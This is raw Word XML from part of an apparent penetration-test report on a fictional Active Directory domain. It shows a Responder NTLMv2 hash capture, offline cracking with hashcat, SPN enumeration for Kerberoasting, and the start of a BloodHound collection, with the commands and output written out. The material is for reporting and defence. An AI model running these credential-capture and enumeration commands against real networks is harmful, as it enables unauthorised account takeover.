            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD70AA9" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DC0E629" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[SMB] NTLMv2-SSP Client   : 192.168.195.205</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4A9AF9" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[SMB] NTLMv2-SSP Username : INLANEFREIGHT\bsmith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45280166" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[SMB] NTLMv2-SSP Hash     : </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF2AF8">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>bsmith::INLANEFREIGHT:7ecXXXXXX98ebc:73D1B2XXXXXXXXXXX45085A651:010100000000000000B588D9F766D801191BB2236A5FAAA50000000002000800330042004B005A0001001E00570049004E002D005400570057005800540047004400390034004300560004003400570049004E002D00540057005700580054004700440039003400430056002E00330042004B005A002E004CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX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p>
          <w:p w14:paraId="2ACA6FB6" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BC94331" w14:textId="119E1970" w:rsidR="00A40765" w:rsidRDefault="0049567A" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="066E7F8C" w14:textId="37E265EF" w:rsidR="00305619" w:rsidRDefault="00F97305" w:rsidP="00F97305">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Retrieving</w:t>
      </w:r>
      <w:r w:rsidR="002C1820">
        <w:t xml:space="preserve"> Password </w:t>
      </w:r>
      <w:r>
        <w:t>Hash with Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D503AF7" w14:textId="52516F89" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Technical_Findings_Details_1"/>
      <w:bookmarkStart w:id="29" w:name="_Toc95329522"/>
      <w:bookmarkStart w:id="30" w:name="_Toc95329688"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00881DF1">
        <w:t xml:space="preserve">The tester was able to "crack" this password hash offline using the Hashcat tool and retrieve the </w:t>
      </w:r>
      <w:r w:rsidR="002B7E55" w:rsidRPr="00881DF1">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="00881DF1">
        <w:t xml:space="preserve"> password value, thus granting a foothold to enumerate the Active Directory domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881DF1" w14:paraId="08A70BC4" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FF7632" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 5600 bsmith_hash /usr/share/wordlists/rockyou.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6660F0" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34A1ABEF" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hashcat (v6.1.1) starting...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="394DB402" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74FF95CD" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C22DAF4" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30367152" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Dictionary cache hit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A636D9" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Filename..: /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A92F76E" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Passwords.: 14344385</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432AED36" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Bytes.....: 139921507</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60DAF793" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>* Keyspace..: 14344385</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B589CC4" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="009253D7" w14:textId="0CA4C8F4" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>BSMITH::INLANEFREIGHT:7eccd965c4b98ebc:73d1b2c8c5f9861eefd31bb45085a651:010100000000000000b588d9f766d801191bb2236a5faaa50000000002000800330042004b005a0001001e00570049004e002d00540057005700580054004700440039003400430056XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX004700440039003400430056002e00330042004b005a002e004c004f00430041004c0003001400330042004b005a002e004c004f00430041004c0005001400330042004b005a002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r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;REDACTED&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00881DF1">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61E7128D" w14:textId="14A4A2F8" w:rsidR="00881DF1" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Cracking </w:t>
      </w:r>
      <w:r w:rsidR="002C1820">
        <w:t xml:space="preserve">Password </w:t>
      </w:r>
      <w:r>
        <w:t>Hash with Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2094C" w14:textId="683F4AFF" w:rsidR="00881DF1" w:rsidRDefault="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00881DF1">
        <w:t>The tester proceeded to enumerate user accounts configured with Service Principal Names (SPNs) that may be subject to a Ke</w:t>
      </w:r>
      <w:r w:rsidR="00A40765">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00881DF1">
        <w:t xml:space="preserve">beroasting attack, a lateral movement/privilege escalation technique that targets SPNs which are unique identifiers that Kerberos uses to map a service instance to a service account. Any domain user can request a Kerberos ticket for any service account in the domain and the ticket is encrypted with the service account's NTLM password hash, which can potentially be "cracked" offline to reveal the account's </w:t>
      </w:r>
      <w:r w:rsidR="002B7E55" w:rsidRPr="00881DF1">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="00881DF1">
        <w:t xml:space="preserve"> password value.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF7345" w14:paraId="655C35B9" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D673370" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="00CF7345" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="003D5536" w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>GetUserSPNs.py INLANEFREIGHT.LOCAL/bsmith -dc-ip 192.168.195.204</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2D2A47" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBBB06C" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="116BF5C8" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C0A543" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ServicePrincipalName                         Name       MemberOf  PasswordLastSet             LastLogon  Delegation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A90F099" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>-------------------------------------------  ---------  --------  --------------------------  ---------  ----------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="256B2820" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL01.inlanefreight.local:1433      mssqlsvc             2022-05-13 16:52:07.280623  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEF27EC" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL02.inlanefreight.local:1433      sqlprod              2022-05-13 16:54:52.889815  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DB4978" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL-DEV01.inlanefreight.local:1433  sqldev               2022-05-13 16:54:57.905315  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9E7E65" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/QA001.inlanefreight.local:1433      sqlqa                2022-05-13 16:55:03.421004  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5163E7EB" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">backupjob/veam001.inlanefreight.local        backupjob            2022-05-13 18:38:17.740269  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6DE7A2" w14:textId="28BE030C" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>vmware/vc.inlanefreight.local                vmwaresvc            2022-05-13 18:39:10.691799  &lt;never</w:t>
            </w:r>
            <w:r w:rsidR="00A40765">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BD5B32E" w14:textId="6CA644C0" w:rsidR="00881DF1" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Listing SPN Accounts with GetUserSPNs.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2500C1" w14:textId="0BFD839F" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>The tester then ran the Python version of the popular BloodHound Active Directory enumeration tool to collect information such as users, groups, computers, ACLs, group membership, user and computer properties, user sessions, local admin access, and more. This data can then be imported into a GUI tool to create visual representations of relationships within the domain and map out "attack paths" that can be used to potentially move laterally or escalate privileges within a domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF7345" w14:paraId="40F2B3C9" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E04E28C" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="00CF7345" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="003D5536" w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo bloodhound-python -u 'bsmith' -p '&lt;REDACTED&gt;' -d inlanefreight.local -ns 192.168.195.204 -c All</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C73EE7A" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56907B16" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Found AD domain: inlanefreight.local</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FCEE0BE" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Connecting to LDAP server: DC01.INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E90CC7D" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
